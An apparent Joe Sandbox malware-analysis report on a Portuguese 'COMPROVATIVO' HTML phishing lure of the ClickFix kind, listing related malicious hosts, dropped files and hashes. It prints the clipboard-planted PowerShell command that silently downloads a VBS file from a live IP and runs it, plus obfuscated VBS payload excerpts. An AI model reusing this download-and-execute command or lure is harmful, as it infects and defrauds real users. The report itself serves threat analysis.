142.251.41.4	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.8
192.168.2.16
192.168.2.23
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1647285
Start date and time:	2025-03-24 17:29:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html renamed because original name is a hash value
Original Sample Name:	COMPROVATIVO-14996813-MARO-ANCZ0-PD9BC - 208.html
Detection:	MAL
Classification:	mal100.phis.expl.evad.winHTML@31/17@6/10
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, TextInputHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.81.238, 142.250.80.99, 142.250.80.46, 172.253.115.84, 142.250.65.206, 142.250.65.238, 199.232.210.172, 142.251.40.110, 142.250.81.234, 142.251.32.106, 142.250.80.74, 142.251.35.170, 142.251.40.138, 142.250.64.74, 172.217.165.138, 142.251.41.10, 142.251.40.170, 142.250.65.234, 142.250.65.170, 142.250.80.42, 142.251.40.106, 142.250.65.202, 142.250.80.10, 142.250.72.106, 142.251.32.110, 142.250.176.206, 184.31.69.3, 142.251.41.14, 142.251.41.3, 34.104.35.123, 142.251.32.99, 142.250.65.174, 52.149.20.212
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, edgedl.me.gvt1.com, translate.googleapis.com, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:30:38	API Interceptor	41x Sleep call for process: powershell.exe modified
12:30:42	API Interceptor	2x Sleep call for process: svchost.exe modified
17:30:36	Clipboard	Run: powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualizao de ficheiro DOCx
17:33:06	Task Scheduler	Run new task: 6 path: wscript.exe s>"C:\Users\user\AppData\Local\Temp\9772.vbs"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.241.60.162	COMPROVATIVO-FAT-62497417-FEVEREIRO-W5QT2-WLND9 - 71-.zip	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	COMPROVATIVO-FAT-62497417-FEVEREIRO-W5QT2-WLND9 - 71-.zip	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	COMPROVATIVO-FAT-62497417-FEVEREIRO-W5QT2-WLND9 - 71-.zip	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	https://www.haseenergia.com/p0p/p0pjan30/p0p-jan/9f685528f449a2625d879c333a9f6736/	Get hash	malicious	Unknown	Browse
	https://www.haseenergia.com/p0p/p0pjan30/p0p-jan/ae9e5b606ef75312d5a2c36863833f9f/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
autoridade-tributaria.com	COMPROVATIVO-FAT-62497417-FEVEREIRO-W5QT2-WLND9 - 71-.zip	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	162.241.60.162
autoridade-tributaria.com	COMPROVATIVO-FAT-62497417-FEVEREIRO-W5QT2-WLND9 - 71-.zip	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	162.241.60.162
s3-r-w.us-east-2.amazonaws.com	CLjv7Z1I0V.exe	Get hash	malicious	Unknown	Browse	52.219.178.114
	COMPROVATIVO-FAT-62497417-FEVEREIRO-W5QT2-WLND9 - 71-.zip	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	52.219.94.74
	http://18.116.28.153/doc.php	Get hash	malicious	Unknown	Browse	3.5.132.90
	6640.vbs	Get hash	malicious	Unknown	Browse	52.219.176.162
	https://heyzine.com/flip-book/119945795f.html	Get hash	malicious	HTMLPhisher	Browse	3.5.128.111
	http://facebook-z5qe9.pagemaker.link/accountsupport/	Get hash	malicious	Unknown	Browse	52.219.94.10
	https://app.nocodb.com/#/nc/view/9594da0e-1289-4245-8374-45df29da3b8c	Get hash	malicious	Unknown	Browse	3.5.131.26
	https://myersgroupllc.s3.us-east-2.amazonaws.com/adobe.html	Get hash	malicious	Unknown	Browse	52.219.98.106
	igmbio.pdf	Get hash	malicious	Unknown	Browse	52.219.93.250

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	Transaction receipt.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://tinyurl.com/2x5dks36__;!!KtM2tloZCg!t4Gwb4Io82PLGf5Ziyn1ynf2MK2R8tVwoHlt6AQrinUFsCCwJRl23VZd9oJ2PaWibwt0lcEQuPw3Iyz8vMIkjw$	Get hash	malicious	Unknown	Browse	108.138.112.90
	https://codes.rewardcodes.com/r2/1/rPZ4Nj5cTC3kOoflT8YQBZLNe4lj6F1eG50m4tUvks8XQ_B-gUWdTkPqjmRlzT1-	Get hash	malicious	Unknown	Browse	13.225.63.75
	https://s3.eu-central-1.amazonaws.com/mailo.html.prod/d684bfaf-79e4-4dfc-84aa-fdb21e3b152c.html	Get hash	malicious	HTMLPhisher	Browse	3.5.134.26
	https://mail-donotreply.com/click/65b6d0e2-d9dd-417c-a2b8-70690576459e	Get hash	malicious	Unknown	Browse	13.35.93.104
	na.elf	Get hash	malicious	Prometei	Browse	54.247.62.1
	na.elf	Get hash	malicious	Prometei	Browse	52.212.150.54
UNIFIEDLAYER-AS-1US	https://s3.eu-central-1.amazonaws.com/mailo.html.prod/d684bfaf-79e4-4dfc-84aa-fdb21e3b152c.html	Get hash	malicious	HTMLPhisher	Browse	69.49.230.198
	Invoice-92010-0verdue-ORDER.docx	Get hash	malicious	HTMLPhisher	Browse	162.241.159.100
	https://teqaloki.site/gasnasalk/hagshaisn/xxx/ZXdlbi5jYWlybnNAZm9zdGVyLWdhbWtvLmNvbQ==	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	192.185.13.169
	FULLDOCS_FEDEX_KOREA AWB#AWB000099075(2)pdf.vbs	Get hash	malicious	GuLoader	Browse	142.4.3.178
	FULLDOCS_FEDEX_KOREA AWB#AWB000099075(2)pdf.vbs	Get hash	malicious	GuLoader	Browse	142.4.3.178
	MV PILATUS MARINE - Vessel Particulars.xlsx.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.144.157
	01. GENJI Q88.pdf.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.144.157
	MV SUPER TRADER.pdf.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.144.157
	https://mandrillapp.com/track/click/31587965/vnt.efv.mybluehost.me?p=eyJzIjoiUlhNQkxsX1NBd3c2MURrNG1QbzZXWHdyRlFVIiwidiI6MiwicCI6IntcInVcIjozMTU4Nzk2NSxcInZcIjoyLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3ZudC5lZnYubXlibHVlaG9zdC5tZVxcXC9kZXZcXFwvXCIsXCJpZFwiOlwiMDVlM2U3YjMyOWVkNDdkMWE0MzI2MzZjYzUyNmM5Y2RcIixcInVybF9pZHNcIjpbXCI1ZTU5NDY4ODEwZTJlY2E4YTdiNDBlZTZlZjA5ZTU4ZmU0ZTVmZGY5XCJdLFwibXNnX3RzXCI6MTc0MjU4MjI4N30ifQ	Get hash	malicious	HTMLPhisher	Browse	162.240.41.143
	PAGO--Draka Durango S.dPaym.2100000562Vend.5310001089.exe	Get hash	malicious	DarkCloud	Browse	162.241.60.209
AMAZON-02US	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	Transaction receipt.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://tinyurl.com/2x5dks36__;!!KtM2tloZCg!t4Gwb4Io82PLGf5Ziyn1ynf2MK2R8tVwoHlt6AQrinUFsCCwJRl23VZd9oJ2PaWibwt0lcEQuPw3Iyz8vMIkjw$	Get hash	malicious	Unknown	Browse	108.138.112.90
	https://codes.rewardcodes.com/r2/1/rPZ4Nj5cTC3kOoflT8YQBZLNe4lj6F1eG50m4tUvks8XQ_B-gUWdTkPqjmRlzT1-	Get hash	malicious	Unknown	Browse	13.225.63.75
	https://s3.eu-central-1.amazonaws.com/mailo.html.prod/d684bfaf-79e4-4dfc-84aa-fdb21e3b152c.html	Get hash	malicious	HTMLPhisher	Browse	3.5.134.26
	https://mail-donotreply.com/click/65b6d0e2-d9dd-417c-a2b8-70690576459e	Get hash	malicious	Unknown	Browse	13.35.93.104
	na.elf	Get hash	malicious	Prometei	Browse	54.247.62.1
	na.elf	Get hash	malicious	Prometei	Browse	52.212.150.54
AMAZON-02US	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	na.elf	Get hash	malicious	Prometei	Browse	34.249.145.219
	Transaction receipt.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://tinyurl.com/2x5dks36__;!!KtM2tloZCg!t4Gwb4Io82PLGf5Ziyn1ynf2MK2R8tVwoHlt6AQrinUFsCCwJRl23VZd9oJ2PaWibwt0lcEQuPw3Iyz8vMIkjw$	Get hash	malicious	Unknown	Browse	108.138.112.90
	https://codes.rewardcodes.com/r2/1/rPZ4Nj5cTC3kOoflT8YQBZLNe4lj6F1eG50m4tUvks8XQ_B-gUWdTkPqjmRlzT1-	Get hash	malicious	Unknown	Browse	13.225.63.75
	https://s3.eu-central-1.amazonaws.com/mailo.html.prod/d684bfaf-79e4-4dfc-84aa-fdb21e3b152c.html	Get hash	malicious	HTMLPhisher	Browse	3.5.134.26
	https://mail-donotreply.com/click/65b6d0e2-d9dd-417c-a2b8-70690576459e	Get hash	malicious	Unknown	Browse	13.35.93.104
	na.elf	Get hash	malicious	Prometei	Browse	54.247.62.1
	na.elf	Get hash	malicious	Prometei	Browse	52.212.150.54

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	25-03-25.exe	Get hash	malicious	AgentTesla	Browse	52.219.108.138
	RFQ 11054.exe	Get hash	malicious	Snake Keylogger	Browse	52.219.108.138
	Price Inquiry PO 211436.pdf.z.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	52.219.108.138
	3-25.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	52.219.108.138
	PO202503BE.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	52.219.108.138
	Price Inquiry PO 211436.exe	Get hash	malicious	Unknown	Browse	52.219.108.138
	Price Inquiry PO 211436.exe	Get hash	malicious	Unknown	Browse	52.219.108.138
	rIMG523000010722100013267543polyhalogen.bat	Get hash	malicious	Remcos, GuLoader	Browse	52.219.108.138
	Bury0302524001.cmd	Get hash	malicious	GuLoader	Browse	52.219.108.138
	RemittanceVO23081100084673.js	Get hash	malicious	AgentTesla	Browse	52.219.108.138
a0e9f5d64349fb13191bc781f81f42e1	jn8DY8kfrM.msi	Get hash	malicious	Unknown	Browse	3.5.129.15
	Bestellung Nr. 130-25105297.PDF.lnk.download.lnk	Get hash	malicious	Unknown	Browse	3.5.129.15
	PRE#U00c7O - RFQ 674441-76450.xla.xlsx	Get hash	malicious	Unknown	Browse	3.5.129.15
	2h.bat	Get hash	malicious	Unknown	Browse	3.5.129.15
	PRE#U00c7O - RFQ 674441-76450.xla.xlsx	Get hash	malicious	Unknown	Browse	3.5.129.15
	Medical GmbH Order.xls	Get hash	malicious	Unknown	Browse	3.5.129.15
	PURCHASE ORDER - PO#267759.xlam.xlsx	Get hash	malicious	Unknown	Browse	3.5.129.15
	Medical GmbH Order.xls	Get hash	malicious	Unknown	Browse	3.5.129.15
	Quotation.xls	Get hash	malicious	Unknown	Browse	3.5.129.15
	Quotation.xls	Get hash	malicious	Unknown	Browse	3.5.129.15

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8307155692193359
Encrypted:	false
SSDEEP:	1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAF:RJE+Lfki1GjHwU/+vVhWqpU
MD5:	69B7C45EC3BE43712831203A8A535091
SHA1:	D6CC00BB447C466548E638E32445C0D61D72B91C
SHA-256:	6A233B2B45528E0CE65E37AC6F290F48B37C38E77E9F1707D7D2A160E4965F28
SHA-512:	B611CA5229146D2D1CE7B0B113EDF8E403CB38CCD8E2748D72070C5D7073EC895F1A52B3EB2B7ED7D50AF5DDE6DDEA4E5E9DDC3942E8DF8B7336EC14D9344079
Malicious:	false
Reputation:	low
Preview:	..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x7901e246, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.9433291081231258
Encrypted:	false
SSDEEP:	1536:zSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:zazaHvxXy2V2UR
MD5:	E43747DC59DE503FFF4919DCF4E19214
SHA1:	17D1C5126BBFF52E7A05ACAB196E87837CB6F602
SHA-256:	62726F2BBE3CF5B0C50B49B9B8E2CBDBBD69D5B8046960FE6AAB047806550732
SHA-512:	C0A80233C148EF9111E03FF87ECFFC41EAAD182F2888BF71BA24A3F2C9A2E7F8DE0C1775994E1554ABEEBF78AC9249850467B5BFE25F98548555E1EB382FA435
Malicious:	false
Reputation:	low
Preview:	y..F... ...............X\...;...{......................0.x...... ...{s.....}..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{.................................._......}.................../..*....}u..........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08217182623823992
Encrypted:	false
SSDEEP:	3:g8pUYe4x96tql/nqlFcl1ZUllllxeB719mYcYllGBnX/l/Tj/k7/t:g8mzS9Gql/qlFclQ/lAx9mU254
MD5:	3A83038750E61B73B716D343FDA8539C
SHA1:	566AF72BF71CEB52C7EB3330A77189A2ED2BC3FC
SHA-256:	3A233514AEC70C75495E62027161579A5F820B97DA3204C593F2E883ECE4C89F
SHA-512:	CC46F1FDEC1E3763382C1F4E3D215C244441A5B74714819B612AF4201804733C84E805E8C9215D8D5C297A172EC4ECBC4351EBC744132CBAFED1611A42EAA94A
Malicious:	false
Preview:	.\|.K.....................................;...{......}u.. ...{s.......... ...{s.. ...{s.P.... ...{s................../......}u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1344
Entropy (8bit):	5.407823187595973
Encrypted:	false
SSDEEP:	24:3gyt7WSKco4KmM6GjKbm51s4RPQoUebIKo+mZ9t7J0gt/NK3R8O9r+J:QyxWSU4YymI4RIoUeW+mZ9tK8NWR8GU
MD5:	7A41CFFC995B3DCBC794EBE499337EC6
SHA1:	8FA7D988B2D2AAA70093995D1A04CE4A7D9AE099
SHA-256:	735F8DCB0F3B899CBE34FBB9EC8828E70834017C5A6A45D04648371BA9A33615
SHA-512:	34C8CE60D66C9EA5C5EBE445F066FCF98C3FF478BB0D85FC077FEF374487DB9F4E14E993796E96D6D79D4CB43629EC0CD82E5DFA8F8EBC73F27A5CECB8970DA1
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\5049.vbs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (712), with CRLF line terminators
Category:	dropped
Size (bytes):	2066876
Entropy (8bit):	4.387665728743556
Encrypted:	false
SSDEEP:	3072:6MwqIF4pvErLH6broRau5DTuig3sjIjmtiurWzrjRACTQtPcc71ONT:e4dELabrDU+dCdCT61Ol
MD5:	9DE7804A3FB5608839C4282CDD4C9E43
SHA1:	04E9FACF279B6E5AB8116C34BE36CF7A46DA14E2
SHA-256:	1A012EB857C32BD21A2F4A61799C96681B81C7B90ED78C615AA082C8FCF9297B
SHA-512:	A1328B58E66312D2AA180A785E09C32F08BED8D81C886C8D9BD2629A74201B9F5A295A500002222640A898A06D4E2D9F4E290A88A546549B41CBA8B3C63F5046
Malicious:	true
Preview:	..lYzJsaDQuGZLxBxmqYsSHZaluAoUXtIKqqHJaLDqG = llXoYVj2(79) + llXoYVj2(117) + llXoYVj2(112) + llXoYVj2(79) + llXoYVj2(116) + llXoYVj2(122) + llXoYVj2(65) + llXoYVj2(100) + llXoYVj2(110) + llXoYVj2(73) + llXoYVj2(85) + llXoYVj2(103) + llXoYVj2(119) + llXoYVj2(68) + llXoYVj2(101) + llXoYVj2(119) + llXoYVj2(90) + llXoYVj2(73) + llXoYVj2(104) + llXoYVj2(107) + llXoYVj2(71) + llXoYVj2(78) + llXoYVj2(73) + llXoYVj2(70) + llXoYVj2(71) + llXoYVj2(88) + llXoYVj2(118) + llXoYVj2(69) + llXoYVj2(85) + llXoYVj2(109) + llXoYVj2(90) + llXoYVj2(68) + llXoYVj2(70) + llXoYVj2(87) + llXoYVj2(102) + llXoYVj2(113) + llXoYVj2(107) + llXoYVj2(117) + llXoYVj2(114) + llXoYVj2(80) + llXoYVj2(105)..JXwoPlewdaYNQyYgZnKVdMXzvttmVwzInXXDjZzdt = llXoYVj2(83) + llXoYVj2(118) + llXoYVj2(82) + llXoYVj2(99) + llXoYVj2(108) + llXoYVj2(110) + llXoYVj2(81) + llXoYVj2(67) + llXoYVj2(112) + llXoYVj2(110) + llXoYVj2(117) + llXoYVj2(117) + llXoYVj2(111) + llXoYVj2(72) + llXoYVj2(86) + llXoYVj2(67) + llXoYVj2(76) + llXoYVj2(109)

C:\Users\user\AppData\Local\Temp\9772.vbs

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	111737
Entropy (8bit):	5.798274350116466
Encrypted:	false
SSDEEP:	3072:VIN4AMd/BiUeUNyeDmonMs5EaLa1GZDfAu:VO4AMd5+UseD7jLa1g3
MD5:	7EC6EFFEEBD46AF1AE7101CAF5584837
SHA1:	0118F633DE0764ACF924F9961555053DF344C1CA
SHA-256:	BA3B7F9B937D7A4848DFF0CA0CAEFC952391C1E12E3CBE276F0FE3202E6CDFAB
SHA-512:	8A205F55850EE9B45268C928DF80F8384DD949FECC7EB316BFB5A8EB4CD80953245810F5AD5A5874C4534FF625B30AF2A9DAE573C00176FFCB5FCFB6BAD7E318
Malicious:	true
Preview:	tDMMhXTNcEkpiqcUhkas = "VIJywMJVZNXzxckDbhLPdaxdnHeJaXPRaPQpoqEtizViOZDUJocMJUzKedfRazBMbyJjgkPhKuFUibUGtArXJWtdVMFNYxkanPPEKdsfUGCftQkHwYhUQOgfbQgTHzUBXWKURBpjZsoklbBUeRaVUcNJKykCQnFludUAppHnpLrEwpUnHnxxIxrNlRtlowtYTrXRSZwoe"..TmHRprGtuZVXFSjSeipQ = "ImKJTtopnKfHZCQjITXDvjKAjtVUteijFmreTLnvPzJmlMzoeDeAwClgRVQGRKmjVtMtzziZmPUjLvdUkvZyIGTElzQqHBVFmKRRSmvOmIILHcYPHyBMkWdIZiQnYfGkmmCLgzvExhThhjEPgNGEnZlhQXLMXXNOEbNszNDjBmxMusrHmqjpXtLPrUwbMFLfVftYdFnsh"..apOAgGhJifixDZwkaTvz = "EWYUyrUbCWTXypDKYSdfqpxWgvPfqWiuxOhjkAuBfYBFIuteywkiSJyAEwJITBEDKJvvpQLMRPfMFyyRgNqANhxtxvUCKDWjUcDnOikPmPucqwhfymkOfFLIoOjvRXztCnuuLxeTTuhhTkIcdpGITXCCFXsWpDDrkNHxfEIfnZiLnIrQuquPhfkjWqiMgsvksWgeazlIV"..ZlwBMwDbMoSWZYKPpvzs = "kqhEjFYwdbKuPfULrlyyWcymyhpNoTSaaDpuVSMvkttlPEQRsaIoqzqhzZerJrzfKxRrCJdYQCRVxyQWKcqYpucHVPncVDbKjlUVzSFiPQmbfAEcoHEeoCqPKSXwssiRrkHIgiaaeyNdlzMjZcGgJKNFLwqbxzAzeGnhTtWCDOBEilXuNEDIUIdgUPBrFMNNsQSShobPi"..cLfrxUKyzFkrkUsfnMWj = "UCGabGssIYPMBzijYkhceUoufStpffqGMChZCKhUpuDnAYneDCMuGCvziIisDNcr

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2etv50i0.trz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsejgeqh.fjo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0ltq4d4.yty.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0jwc3jg.ko0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (364), with no line terminators
Category:	downloaded
Size (bytes):	364
Entropy (8bit):	4.037973479640938
Encrypted:	false
SSDEEP:	6:+13H0s023H0s0s0s02H02H023H02333333333333b:+13H3XFF3F333333333333b
MD5:	033D040B7B167FCC311203A63FBF5BEC
SHA1:	E8F67D0F79BACCDFDA8B2E89223B9F45426561CE
SHA-256:	50BB1A5EDB041B749CF25648505E5C1E6C4AA43BD29EFD967D21910C1CD0DBDC
SHA-512:	DF41E97063CD31CEECEF30CD75213995C1137B75B267728A676F01BC25A2925F37D26E6C10719ADF2556199CE8FA5FE2BEEDD77EA703DC70014E459A100D7C9D
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhLkAQmQnLv9M2wUgRIFDZFhlU4SBQ2RYZVOEgUNBu27_xIFDQbtu_8SBQ2RYZVOEgUNkWGVThIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ2RYZVOEgUNBu27_xIFDZFhlU4SBQ0G7bv_EgUNkWGVThIFDZFhlU4SBQ0G7bv_EgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVTiFBSLFNQOQHZg==?alt=proto
